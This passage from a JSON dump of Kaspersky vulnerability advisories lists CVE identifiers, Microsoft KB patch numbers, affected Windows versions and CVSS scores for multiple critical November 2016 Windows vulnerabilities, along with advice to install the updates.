\n[CVE-2016-7184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7184>)0.0Unknown \n[CVE-2016-7205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7205>)0.0Unknown \n[CVE-2016-7210](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7210>)0.0Unknown \n[CVE-2016-7212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7212>)0.0Unknown \n[CVE-2016-7214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7214>)0.0Unknown \n[CVE-2016-7215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7215>)0.0Unknown \n[CVE-2016-7216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7216>)0.0Unknown \n[CVE-2016-7218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7218>)0.0Unknown \n[CVE-2016-7221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7221>)0.0Unknown\n\n### *KB list*:\n[3181707](<http://support.microsoft.com/kb/3181707>) \n[3193418](<http://support.microsoft.com/kb/3193418>) \n[3194371](<http://support.microsoft.com/kb/3194371>) \n[3196718](<http://support.microsoft.com/kb/3196718>) \n[3197867](<http://support.microsoft.com/kb/3197867>) \n[3197868](<http://support.microsoft.com/kb/3197868>) \n[3198234](<http://support.microsoft.com/kb/3198234>) \n[3198483](<http://support.microsoft.com/kb/3198483>) \n[3198510](<http://support.microsoft.com/kb/3198510>) \n[3203859](<http://support.microsoft.com/kb/3203859>) \n[3197655](<http://support.microsoft.com/kb/3197655>) \n[3203621](<http://support.microsoft.com/kb/3203621>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2016-11-08T00:00:00", "id": "KLA11832", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11832", "title": "\r KLA11832Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:42:14", "bulletinFamily": "info", "cvelist": ["CVE-2016-7221", "CVE-2016-7184", "CVE-2016-3338", "CVE-2016-3334", "CVE-2016-7216", "CVE-2016-7237", "CVE-2016-7246", "CVE-2016-7248", "CVE-2016-3335", "CVE-2016-7218", "CVE-2016-7217", "CVE-2016-7247", "CVE-2016-7210", "CVE-2016-7214", "CVE-2016-3343", "CVE-2016-3333", "CVE-2016-7202", "CVE-2016-7223", "CVE-2016-7225", "CVE-2016-0026", "CVE-2016-7205", "CVE-2016-7256", "CVE-2016-7222", "CVE-2016-7238", "CVE-2016-3332", "CVE-2016-7224", "CVE-2016-7226", "CVE-2016-7255", "CVE-2016-3342", "CVE-2016-7215", "CVE-2016-7220", "CVE-2016-7212", "CVE-2016-3340"], "description": "### *Detect date*:\n11/08/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service, obtain sensitive information.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Vista Service Pack 2 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nMicrosoft Windows Hyperlink Object Library \nWindows Server 2016 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Vista x64 Edition Service Pack 2 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-7202](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7202>) \n[CVE-2016-7256](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7256>) \n[CVE-2016-7255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7255>) \n[CVE-2016-7248](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7248>) \n[CVE-2016-7247](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7247>) \n[CVE-2016-7246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7246>) \n[CVE-2016-7238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7238>) \n[CVE-2016-7237](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7237>) \n[CVE-2016-0026](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0026>) \n[CVE-2016-3332](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3332>) \n[CVE-2016-3333](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3333>) \n[CVE-2016-3334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3334>) \n[CVE-2016-3335](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3335>) \n[CVE-2016-3338](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3338>) \n[CVE-2016-3340](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3340>) \n[CVE-2016-3342](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3342>) \n[CVE-2016-3343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3343>) \n[CVE-2016-7184](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7184>) \n[CVE-2016-7205](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7205>) \n[CVE-2016-7210](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7210>) \n[CVE-2016-7212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7212>) \n[CVE-2016-7214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7214>) \n[CVE-2016-7215](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7215>) \n[CVE-2016-7216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7216>) \n[CVE-2016-7217](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7217>) \n[CVE-2016-7218](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7218>) \n[CVE-2016-7220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7220>) \n[CVE-2016-7221](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7221>) \n[CVE-2016-7222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7222>) \n[CVE-2016-7223](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7223>) \n[CVE-2016-7224](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7224>) \n[CVE-2016-7225](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7225>) \n[CVE-2016-7226](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7226>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2016-7202](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202>)0.0Unknown \n[CVE-2016-7256](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7256>)0.0Unknown \n[CVE-2016-7255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255>)0.0Unknown \n[CVE-2016-7248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7248>)0.0Unknown \n[CVE-2016-7247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7247>)0.0Unknown \n[CVE-2016-7246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7246>)0.0Unknown \n[CVE-2016-7238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7238>)0.0Unknown \n[CVE-2016-7237](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7237>)0.0Unknown \n[CVE-2016-0026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0026>)0.0Unknown \n[CVE-2016-3332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3332>)0.0Unknown \n[CVE-2016-3333](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3333>)0.0Unknown \n[CVE-2016-3334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3334>)0.0Unknown \n[CVE-2016-3335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3335>)0.0Unknown \n[CVE-2016-3338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3338>)0.0Unknown \n[CVE-2016-3340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3340>)0.0Unknown \n[CVE-2016-3342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3342>)0.0Unknown \n[CVE-2016-3343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3343>)0.0Unknown \n[CVE-2016-7184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7184>)0.0Unknown \n[CVE-2016-7205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7205>)0.0Unknown \n[CVE-2016-7210](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7210>)0.0Unknown \n[CVE-2016-7212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7212>)0.0Unknown \n[CVE-2016-7214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7214>)0.0Unknown \n[CVE-2016-7215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7215>)0.0Unknown \n[CVE-2016-7216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7216>)0.0Unknown \n[CVE-2016-7217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7217>)0.0Unknown \n[CVE-2016-7218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7218>)0.0Unknown \n[CVE-2016-7220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7220>)0.0Unknown \n[CVE-2016-7221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7221>)0.0Unknown \n[CVE-2016-7222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7222>)0.0Unknown \n[CVE-2016-7223](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7223>)0.0Unknown \n[CVE-2016-7224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7224>)0.0Unknown \n[CVE-2016-7225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7225>)0.0Unknown \n[CVE-2016-7226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7226>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3200970](<http://support.microsoft.com/kb/3200970>) \n[3181707](<http://support.microsoft.com/kb/3181707>) \n[3193418](<http://support.microsoft.com/kb/3193418>) \n[3194371](<http://support.microsoft.com/kb/3194371>) \n[3196718](<http://support.microsoft.com/kb/3196718>) \n[3197873](<http://support.microsoft.com/kb/3197873>) \n[3197874](<http://support.microsoft.com/kb/3197874>) \n[3197876](<http://support.microsoft.com/kb/3197876>) \n[3197877](<http://support.microsoft.com/kb/3197877>) \n[3198218](<http://support.microsoft.com/kb/3198218>) \n[3198234](<http://support.microsoft.com/kb/3198234>) \n[3198483](<http://support.microsoft.com/kb/3198483>) \n[3198510](<http://support.microsoft.com/kb/3198510>) \n[3198585](<http://support.microsoft.com/kb/3198585>) \n[3198586](<http://support.microsoft.com/kb/3198586>) \n[3203859](<http://support.microsoft.com/kb/3203859>) \n[3208481](<http://support.microsoft.com/kb/3208481>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 45, "modified": "2020-07-22T00:00:00", "published": "2016-11-08T00:00:00", "id": "KLA10897", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10897", "title": "\r KLA10897Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}